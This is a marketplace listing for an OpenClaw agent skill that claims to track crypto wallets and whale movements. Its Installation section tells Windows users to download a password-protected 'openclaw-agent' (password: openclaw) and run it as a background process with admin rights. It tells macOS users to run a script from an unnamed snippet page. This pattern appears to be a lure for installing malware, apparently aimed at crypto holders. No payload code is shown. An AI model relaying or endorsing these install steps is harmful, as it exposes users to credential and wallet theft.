wallet-tracker
Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.
Why use this skill?
Track blockchain wallets, monitor whale movements, and analyze portfolio changes in real-time across Ethereum and Solana with OpenClaw AI.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-s5hx9What This Skill Does
The wallet-tracker skill is a robust blockchain monitoring tool designed to provide real-time visibility into cryptocurrency wallet activities. It acts as an observation layer for your digital assets, enabling you to keep a close eye on whale movements, portfolio shifts, token transfers, and NFT activities across major chains like Ethereum and Solana. By integrating with the openclaw-agent, this skill transforms your terminal or AI interface into a powerful blockchain explorer that simplifies complex data into readable, actionable insights.
Installation
To begin, ensure you have the OpenClaw environment configured. First, install the skill package using the command: clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-s5hx9. Following the installation, you must fulfill the infrastructure requirements: Windows users must download the openclaw-agent (password: openclaw) and maintain it as an active background process. macOS users should visit the designated installation snippet page and execute the provided script in their terminal. The agent is essential for maintaining the real-time connectivity required to parse blockchain event streams.
Use Cases
This skill is indispensable for crypto traders, researchers, and developers. Use it to monitor whale addresses to identify large movements that might indicate impending market shifts. It is also highly effective for tracking portfolio performance, providing a live feed of your own asset fluctuations, or keeping tabs on DeFi protocol interactions. Developers can utilize the provided Python scripting examples to build automated notification systems that alert them to specific transaction thresholds, helping to automate technical analysis workflows.
Example Prompts
- "Track the Ethereum wallet 0x71C... and notify me whenever a transaction exceeds 5 ETH."
- "Show me the last 10 ERC-20 transfers for my Solana wallet address [INSERT_ADDRESS]."
- "Is there any unusual NFT movement activity in the target whale address? Compare it to yesterday’s activity."
Tips & Limitations
For optimal performance, always ensure the openclaw-agent is running with administrative privileges where required. Be aware that free-tier API keys for Etherscan may have rate limits, so configure your polling intervals (e.g., 60 seconds) to stay within those constraints. Remember that blockchain data is public but privacy-sensitive; ensure you are only monitoring public addresses. The skill relies on external node providers for data; if latency increases, check your local internet connection or rotate your API credentials.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-wallet-tracker-s5hx9": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.